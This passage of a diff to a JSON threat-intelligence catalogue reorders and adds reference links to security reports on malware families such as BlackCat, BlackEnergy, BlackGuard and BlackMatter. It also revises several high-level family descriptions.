"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack", + "https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous", + "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/", "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", - "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack", + "https://www.mandiant.com/resources/blog/alphv-ransomware-backup", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://www.intrinsec.com/alphv-ransomware-gang-analysis/", + "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", + "https://community.riskiq.com/article/47766fbd", + "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", + "https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", - 
"https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022", - "https://unit42.paloaltonetworks.com/blackcat-ransomware/", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://community.riskiq.com/article/47766fbd", - "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/", - "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/", - "https://securityscorecard.com/blog/ttps-associated-with-new-version-of-blackcat-ransomware", - "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", - "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/", - "https://securelist.com/modern-ransomware-groups-ttps/106824/", - "https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html", - "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware", - "https://blog.group-ib.com/blackcat", - 
"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://killingthebear.jorgetesta.tech/actors/alphv", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html", + "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809", + "https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/", + "https://securelist.com/a-bad-luck-blackcat/106254/", + "https://www.ic3.gov/Media/News/2022/220420.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps", - "https://github.com/f0wl/blackCatConf", - "https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous" + "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/", + "https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html", + "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf", + "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/", + "https://github.com/f0wl/blackCatConf" ], "synonyms": [ "ALPHV", 
@@ -15582,19 +16293,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee",
- "https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/",
- "https://attack.mitre.org/groups/G0096",
- "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://www.youtube.com/watch?v=NFJqD-LcpIg",
- "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1",
 "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf",
+ "https://attack.mitre.org/groups/G0025/",
+ "https://attack.mitre.org/groups/G0096",
 "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
 "https://attack.mitre.org/software/S0069/",
 "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf",
- "https://attack.mitre.org/groups/G0001/",
- "https://attack.mitre.org/groups/G0025/",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk"
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1",
+ "https://www.youtube.com/watch?v=NFJqD-LcpIg"
 ],
 "synonyms": [
 "PNGRAT",
@@ -15607,36 +16318,36 @@
 "value": "BLACKCOFFEE"
 },
 {
- "description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo “remote desktop”\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.",
+ "description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo \u201cremote desktop\u201d\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy",
- "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
- "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
- "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/",
- "https://securelist.com/black-ddos/36309/",
- "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
- "https://www.secureworks.com/research/threat-profiles/iron-viking",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://attack.mitre.org/groups/G0034",
- "http://pds15.egloos.com/pds/201001/01/66/BlackEnergy_DDoS_Bot_Analysis.pdf",
- "https://threatconnect.com/blog/casting-a-light-on-blackenergy/",
- "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/",
- "https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html",
- "https://marcusedmondson.com/2019/01/18/black-energy-analysis/",
 "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
- "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
- "https://www.secureworks.com/research/blackenergy2",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
- "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
- "http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
 "https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf"
+ "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
+ "http://pds15.egloos.com/pds/201001/01/66/BlackEnergy_DDoS_Bot_Analysis.pdf",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
+ "https://www.secureworks.com/research/blackenergy2",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://securelist.com/black-ddos/36309/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://threatconnect.com/blog/casting-a-light-on-blackenergy/",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf",
+ "https://attack.mitre.org/groups/G0034",
+ "http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf",
+ "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/",
+ "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/",
+ "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html",
+ "https://marcusedmondson.com/2019/01/18/black-energy-analysis/"
 ],
 "synonyms": [],
 "type": []
@@ -15649,20 +16360,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackguard",
+ "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
+ "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
+ "https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data",
+ "https://cyberint.com/blog/research/blackguard-stealer/",
+ "https://www.youtube.com/watch?v=Fd8WjxzY2_g",
+ "https://www.zdnet.com/article/meet-blackguard-a-new-infostealer-peddled-on-russian-hacker-forums/",
+ "https://thehackernews.com/2022/04/experts-shed-light-on-blackguard.html",
+ "https://medium.com/s2wblog/rising-stealer-in-q1-2022-blackguard-stealer-f516d9f85ee5",
 "https://blogs.blackberry.com/en/2022/04/threat-thursday-blackguard-infostealer",
 "https://ke-la.com/information-stealers-a-new-landscape/",
- "https://www.zdnet.com/article/meet-blackguard-a-new-infostealer-peddled-on-russian-hacker-forums/",
- "https://medium.com/s2wblog/rising-stealer-in-q1-2022-blackguard-stealer-f516d9f85ee5",
- "https://thehackernews.com/2022/04/experts-shed-light-on-blackguard.html",
 "https://www.zscaler.com/blogs/security-research/analysis-blackguard-new-info-stealer-malware-being-sold-russian-hacking",
+ "https://medium.com/s2wblog/the-history-of-blackguard-stealer-86207e72ffb4",
 "https://blog.cyble.com/2022/04/01/dissecting-blackguard-info-stealer/",
 "https://www.bleepingcomputer.com/news/security/new-blackguard-password-stealing-malware-sold-on-hacker-forums/",
- "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
- "https://www.youtube.com/watch?v=Fd8WjxzY2_g",
- "https://cyberint.com/blog/research/blackguard-stealer/",
- "https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data",
- "https://medium.com/s2wblog/the-history-of-blackguard-stealer-86207e72ffb4",
- "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
 "https://www.techtimes.com/articles/273752/20220331/new-password-stealing-malware-hacking-forum-hack-password-stealing-google-chrome-binance-outlook-telegram.htm"
 ],
 "synonyms": [],
@@ -15676,13 +16387,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackkingdom_ransomware",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://news.sophos.com/en-us/2021/03/23/black-kingdom/",
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
 "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
 "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html",
- "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
- "https://news.sophos.com/en-us/2021/03/23/black-kingdom/",
- "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html",
 "https://securelist.com/black-kingdom-ransomware/102873/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html"
 ],
 "synonyms": [],
 "type": []
@@ -15695,9 +16406,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacklotus",
- "https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/",
 "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/",
- "https://www.binarly.io/posts/The_Untold_Story_of_the_BlackLotus_UEFI_Bootkit/index.html"
+ "https://mssplab.github.io/threat-hunting/2023/07/15/malware-src-blacklotus.html",
+ "https://kn0s-organization.gitbook.io/blacklotus-analysis-stage2-bootkit-rootkit-stage/",
+ "https://www.binarly.io/posts/The_Untold_Story_of_the_BlackLotus_UEFI_Bootkit/index.html",
+ "https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/"
 ],
 "synonyms": [],
 "type": []
@@ -15719,65 +16432,65 @@
 "value": "BlackMagic"
 },
 {
- "description": "Ransomware-as-a-Service ",
+ "description": "According to PCrisk, BlackMatter is a piece of malicious software categorized as ransomware. It operates by encrypting data for the purpose of making ransom demands for the decryption tools. In other words, files affected by BlackMatter are rendered inaccessible, and victims are asked to pay - to recover access to their data.\r\n\r\nDuring the encryption process, files are appended with an extension consisting of a random character string. For example, a file initially named \"1.jpg\" would appear as something similar to \"1.jpg.k5RO9fVOl\". After this process is complete, the ransomware changes the desktop wallpaper and created a ransom note - \"[random_string].README.txt\" (e.g., k5RO9fVOl.README.txt).",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter",
- "https://chuongdong.com/reverse%20engineering/2021/09/05/BlackMatterRansomware/",
- "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
- "https://blog.digital-investigations.info/2021-08-05-understanding-blackmatters-api-hashing.html",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
 "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html",
- "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809",
- "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/",
- "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
- "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html",
- "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-291a",
- "https://www.mandiant.com/resources/cryptography-blackmatter-ransomware",
- "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.nozominetworks.com/blog/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs/",
- "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
- "https://www.varonis.com/blog/blackmatter-ransomware/",
- "https://therecord.media/blackmatter-ransomware-says-its-shutting-down-due-to-pressure-from-local-authorities/",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
- "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
- "https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://twitter.com/GelosSnake/status/1451465959894667275",
- "https://blog.group-ib.com/blackmatter#",
 "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://www.glimps.fr/lockbit3-0/",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration",
- "https://blog.group-ib.com/blackmatter2",
- "https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.netskope.com/blog/netskope-threat-coverage-blackmatter",
- "https://www.youtube.com/watch?v=NIiEcOryLpI",
- "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/",
- "https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf",
- "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/",
- "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps",
- "https://blog.minerva-labs.com/blackmatter",
- "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
 "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://blog.digital-investigations.info/2021-08-05-understanding-blackmatters-api-hashing.html",
+ "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
+ "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-291a",
+ "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
+ "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/",
+ "https://twitter.com/GelosSnake/status/1451465959894667275",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/",
+ "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/",
+ "https://blog.minerva-labs.com/blackmatter",
+ "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
+ "https://blog.group-ib.com/blackmatter#",
+ "https://blog.group-ib.com/blackmatter2",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.varonis.com/blog/blackmatter-ransomware/",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://chuongdong.com/reverse%20engineering/2021/09/05/BlackMatterRansomware/",
+ "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html",
+ "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
+ "https://therecord.media/blackmatter-ransomware-says-its-shutting-down-due-to-pressure-from-local-authorities/",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
+ "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
+ "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf",
+ "https://www.mandiant.com/resources/cryptography-blackmatter-ransomware",
+ "https://www.netskope.com/blog/netskope-threat-coverage-blackmatter",
+ "https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809",
+ "https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps",
+ "https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/",
+ "https://www.glimps.fr/lockbit3-0/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.nozominetworks.com/blog/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs/",
+ "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
+ "https://www.youtube.com/watch?v=NIiEcOryLpI",
+ "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
